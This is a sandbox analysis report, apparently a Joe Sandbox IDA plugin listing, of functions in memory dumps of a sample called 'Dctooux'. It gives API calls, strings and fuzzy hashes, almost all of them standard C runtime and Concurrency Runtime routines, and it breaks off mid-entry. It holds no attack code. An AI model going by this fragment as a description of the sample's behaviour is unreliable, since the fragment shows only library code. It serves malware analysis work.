Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: e5fb11010c4129a3f62afd58f963d1c3925b98053832446ea1348d3a6d28f2a8
Instruction ID: b5e01fe82297e5dc35bd6a091cefef468bb5e75df381aed9bf15ef02d49fdb6f
Opcode Fuzzy Hash: e5fb11010c4129a3f62afd58f963d1c3925b98053832446ea1348d3a6d28f2a8
Instruction Fuzzy Hash: 72317A32D01619DFCB14EFA4EA915EEB7B1BF94318F04C16BD8092B282DB316E04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A9041A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A90432

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A90444
_free.LIBCMT ref: 00A90456
_free.LIBCMT ref: 00A90468
_free.LIBCMT ref: 00A9047A

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6373c89215c32910aefc3796b645dea9f0518294cd9dc7e50d3edc69c4160c74
Instruction ID: 7a8196717df8a7145e0218b873d3abef3a98c7a91a1774ccb40a097e785bb689
Opcode Fuzzy Hash: 6373c89215c32910aefc3796b645dea9f0518294cd9dc7e50d3edc69c4160c74
Instruction Fuzzy Hash: 5FF0FF72B45600AFCA60FBA8EAC5E1A77E9EA807707644D05F649D7912CA30FC818A74

Uniqueness

Uniqueness Score: -1.00%

Function 00A605DB Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

Strings

246122658369, xrefs: 00A60737
111, xrefs: 00A607A0
Wxt=, xrefs: 00A6071D

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: 111$246122658369$Wxt=
API String ID: 0-3038465709
Opcode ID: fa49241469a32a91151dbb5f14efd3098e7c5cbb7ce962d70204c2fa33881f9c
Instruction ID: 95cf2228ee9dde21aaff56eca0f2eaa1111d29387181593ebaf8511167882552
Opcode Fuzzy Hash: fa49241469a32a91151dbb5f14efd3098e7c5cbb7ce962d70204c2fa33881f9c
Instruction Fuzzy Hash: 6FB1F471A102489BEB08DF78CE85B9E7B76EB85304F608218F805973C6D779DAC48B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7C2B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 00A7C33A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7C35F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00A7C39E

Strings

pExecutionResource, xrefs: 00A7C357

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: a4d6316d53fd19a15b378c0a4b4f2a7c403d7308d55ed8a4ce48820bb9cd0d64
Instruction ID: 9b5334d7772bcb02774ad2609e8cc92fdbe2cbef36c389808eecf53197097a42
Opcode Fuzzy Hash: a4d6316d53fd19a15b378c0a4b4f2a7c403d7308d55ed8a4ce48820bb9cd0d64
Instruction Fuzzy Hash: A2219375700205ABCF09EFA4CE42BEDB7B5BF58700F148029F5056B282DBB4EE018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B53E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00A7B552
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00A7B576
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7B589

Strings

pScheduler, xrefs: 00A7B581

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 6c821348500fc75f57582ad5365ed30d1d9a73e306f6eb386d07a0b2a7ad41c7
Instruction ID: 9cbc18ca84e4b921f601b0094d1cdc2f02bf09c653ca5a74675df5c463e70fe8
Opcode Fuzzy Hash: 6c821348500fc75f57582ad5365ed30d1d9a73e306f6eb386d07a0b2a7ad41c7
Instruction Fuzzy Hash: E6F0B476A00604A7C724EB54DD52D9DB379AE94B21710C56AF41F13582DB70ED05C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8DED0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A8DF57

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 2465fa379da28f7971e2aa9bf4b20d0ad2775fd8829363fabe13014411cdee06
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 97B14632A00285DFDB11EF28C881BFEBBF5EF55340F14856AE955DB281D6758D01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A8649E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00A86565
___AdjustPointer.LIBCMT ref: 00A86588
___AdjustPointer.LIBCMT ref: 00A86624

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0d38429a4a113caded9c1f31fd27b3265ccaf42daee0688dc30a3d1f59ec2ba7
Instruction ID: 3c99815202302e9621ad92a7bdd3842d2cf838d33ee2d627abc8462379fbcf30
Opcode Fuzzy Hash: 0d38429a4a113caded9c1f31fd27b3265ccaf42daee0688dc30a3d1f59ec2ba7
Instruction Fuzzy Hash: 9451D072A00202AFFB2DAF14DA41BBAB7B4FF14320F14452DE90597699EB31EC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A86065 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00A860B6
TypeidsEqual.LIBVCRUNTIME ref: 00A860DB
PMDtoOffset.LIBCMT ref: 00A860F1
PMDtoOffset.LIBCMT ref: 00A86172

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: ca2bbd809dc78b43d2c77f830f75221351ebafe2b50fcae10ef2a8d6391edd23
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: B951BE35D042099FEF11EF68C985AAEFBF5EF15354F14464AD840A7253D732A948CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A52DC0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00A52E5F
GetCurrentThreadId.KERNEL32 ref: 00A52E7E
__Mtx_unlock.LIBCPMT ref: 00A52ECC
__Cnd_broadcast.LIBCPMT ref: 00A52EE3

Part of subcall function 00A6DAFC: mtx_do_lock.LIBCPMT ref: 00A6DB04

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
String ID:
API String ID: 3471820992-0
Opcode ID: bbe2ef6d0793ebc38f18e2e1f31eac4c5c81ff1188d1b78591210f969c3a02e6
Instruction ID: c01fc2c4651a051249e655435e06233aea5ba24a4cad854b2dab0a6c86ae367f
Opcode Fuzzy Hash: bbe2ef6d0793ebc38f18e2e1f31eac4c5c81ff1188d1b78591210f969c3a02e6
Instruction Fuzzy Hash: C541EEB1E01205AFDB20DF64CA41B5AB7F8FF16351F004629EC1AD7680EB34EA18CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A973AE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A9747E
_free.LIBCMT ref: 00A974A7
SetEndOfFile.KERNEL32(00000000,00A92DEA,00000000,00A93081,?,?,?,?,?,?,?,00A92DEA,00A93081,00000000), ref: 00A974D9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00A92DEA,00A93081,00000000,?,?,?,?,00000000), ref: 00A974F5

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 34b8d08cd990d157d3883a4cc823bd91ba6918f154987f473ee874343af0dbf1
Instruction ID: fbd077c3b5c0f7d6f81fc97f482f6baae5fa81d8e9e4341b1872ced151a870cc
Opcode Fuzzy Hash: 34b8d08cd990d157d3883a4cc823bd91ba6918f154987f473ee874343af0dbf1
Instruction Fuzzy Hash: FC41A372B186059BDF11ABB8CD46BAE7BF5AF84320F140550F928EB193DA34CC509772

Uniqueness

Uniqueness Score: -1.00%

Function 00A7414C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00A7415F

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 77b56431cf3383a24b99a76283668a2133e0698c46efca832dc897332c14488e
Instruction ID: 73d39358e547df87449c988761ec8f5e989e9e48357050facf0df73d70de7714
Opcode Fuzzy Hash: 77b56431cf3383a24b99a76283668a2133e0698c46efca832dc897332c14488e
Instruction Fuzzy Hash: B8316D75A00309DFCF10EF94C9C0BAE7BB9BF49314F1480A9ED09AB246D731A955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8ED2F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00A87E1C: _free.LIBCMT ref: 00A87E2A

Part of subcall function 00A8FD06: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00A961A0,?,00000000,00000000), ref: 00A8FDA8

GetLastError.KERNEL32 ref: 00A8ED97
__dosmaperr.LIBCMT ref: 00A8ED9E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00A8EDDD
__dosmaperr.LIBCMT ref: 00A8EDE4

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 0da46266772ef03ac78aec912df7815d48a6ec4fa6f835e13091672a08654dc4
Instruction ID: 988b779b466942487553a3afd84d2125c4d27f114b03249debf6e88dc4185175
Opcode Fuzzy Hash: 0da46266772ef03ac78aec912df7815d48a6ec4fa6f835e13091672a08654dc4
Instruction Fuzzy Hash: 1721C272604216EFDB20FFA58D81A6BB7ADEF053647108528F92997150EB30EC558BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A81EE8 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 00A81F39
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A81F21

Part of subcall function 00A7A37F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A7A3A0

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A81F9C
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,00AB2410), ref: 00A81FA1

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: d052e54581cc68459ba04b09a5d90a8140112794bc954dee77dbc77ced03c41c
Instruction ID: 0f5592dce45c8a564571182132e93f00db38e065cd524f0d418a951d75016ca5
Opcode Fuzzy Hash: d052e54581cc68459ba04b09a5d90a8140112794bc954dee77dbc77ced03c41c
Instruction Fuzzy Hash: 3821C975700215BFC710FB58DD459AEB7BCFB58760F008456FA1AA3291DB70AD028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B0E5 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00A7B0EC
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00A7B138
std::bad_exception::bad_exception.LIBCMT ref: 00A7B14E
std::bad_exception::bad_exception.LIBCMT ref: 00A7B1BA

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 7674a731a9691b836b1ecaac2b3b5c48ba74c55c44b911f7eba422fa56a1d28b
Instruction ID: a2892396194607a8082cd9b09fde86ba708b8e439ba8d1c5571ea3df0e8b19e8
Opcode Fuzzy Hash: 7674a731a9691b836b1ecaac2b3b5c48ba74c55c44b911f7eba422fa56a1d28b
Instruction Fuzzy Hash: A42192B6901214AFDB05EF64DD96ADEB7B4AF05310F50C02AF419AB152DB716E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BA51 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,75295780,?,00A87D9A,75295780,00000000,?,?,00A889CE,00A56B19,00000000,75295780), ref: 00A8BA56
_free.LIBCMT ref: 00A8BAB3
_free.LIBCMT ref: 00A8BAE9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00A889CE,00A56B19,00000000,75295780), ref: 00A8BAF4

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c869c96d83ce904608ada2645bc7c58a7988d580b25c5009f6ff03ff79143dc7
Instruction ID: f9776326f615c124d3429e5eee04bda02ed36d88c2140bdce2fe809ee8538d93
Opcode Fuzzy Hash: c869c96d83ce904608ada2645bc7c58a7988d580b25c5009f6ff03ff79143dc7
Instruction Fuzzy Hash: 9E110272664601ABC615B7BC6C89F3B655DDBC17B4B640325F620921E3EF318C024B30

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BBA8 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00A67EF7,00A67EF7,8B18EC83,00A88968,00A8C46E,?,?,00A6E851,00A67EF7,?,00A68D7B,8B18EC84,74DF0F00), ref: 00A8BBAD
_free.LIBCMT ref: 00A8BC0A
_free.LIBCMT ref: 00A8BC40
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00A6E851,00A67EF7,?,00A68D7B,8B18EC84,74DF0F00), ref: 00A8BC4B

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: fa2a5c2508772e9ad8104624d4830b0c2deb7728a40e75b140b37debd700135c
Instruction ID: dfd31e068ca3f058961021ea56fef9c1315ebc9e2e32352d846f3e1cc8fc09b6
Opcode Fuzzy Hash: fa2a5c2508772e9ad8104624d4830b0c2deb7728a40e75b140b37debd700135c
Instruction Fuzzy Hash: 6D1104B2650A016AD61177BCADC9F2A256DEBC5770F680335F614861E3EF358C035B30

Uniqueness

Uniqueness Score: -1.00%

Function 00A7073D Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A7075F

Part of subcall function 00A7091B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00A768D6

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00A70780

